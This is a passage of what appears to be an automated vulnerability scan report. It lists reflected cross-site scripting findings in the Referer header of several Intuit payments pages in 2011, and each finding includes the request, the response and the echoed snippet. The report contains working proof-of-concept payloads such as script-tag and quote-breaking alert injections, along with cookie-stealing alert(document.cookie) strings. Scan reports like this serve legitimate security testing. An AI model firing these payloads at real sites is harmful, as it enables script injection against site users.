1.53. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload addb8'-alert(1)-'021e03ba62f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=addb8'-alert(1)-'021e03ba62f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:14 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Ub5cWhPyc75agcHyjLX5HA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:15 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960AADB0A0805192AA117E39FDA00CC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150347


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=addb8'-alert(1)-'021e03ba62f';
                   </script>
...[SNIP]...

1.54. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a2606--><script>alert(1)</script>36ea6b49a2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=a2606--><script>alert(1)</script>36ea6b49a2c

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=qJb8zYJPmpX9fWPDb9drlw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960DDDB0A0805192AA117E34918359D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150376


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=a2606--><script>alert(1)</script>36ea6b49a2c | -->
...[SNIP]...

1.55. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 1478c--><script>alert(1)</script>ce81d71fd63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=1478c--><script>alert(1)</script>ce81d71fd63

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Zvyev1DIPRbxZ1pNkQQ+JA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F84AD0A0805192AA117E37A6A466C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121601


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=1478c--><script>alert(1)</script>ce81d71fd63 | -->
...[SNIP]...

1.56. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caed3'-alert(1)-'2634c597979 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=caed3'-alert(1)-'2634c597979

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:46 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=l+8G2jJlBi1HTw87YjT0qA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:47 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F54670A0805192AA117E3EA66DDD4
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121568


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=caed3'-alert(1)-'2634c597979';
                   </script>
...[SNIP]...

1.57. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload ef8c6--><script>alert(1)</script>b4f50ac6cd0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ef8c6--><script>alert(1)</script>b4f50ac6cd0

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:40 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=bXui4YZA+O-2ZvpBHdsyqQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:41 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F3B280A0805192AA117E302939460
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127127


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=ef8c6--><script>alert(1)</script>b4f50ac6cd0 | -->
...[SNIP]...

1.58. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86458'-alert(1)-'2f8b7b8371f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=86458'-alert(1)-'2f8b7b8371f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:26 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FA-3Ik5F2gUo8heU3wf98g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:27 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F06D70A0805192AA117E3351F6E5A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127094


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=86458'-alert(1)-'2f8b7b8371f';
                   </script>
...[SNIP]...

1.59. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecbd'-alert(1)-'a54af6c28ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6ecbd'-alert(1)-'a54af6c28ec

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=NiG1d4F8Z+SeG-SglGtlog**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96069050A0805192AA117E328077B90
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116386


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
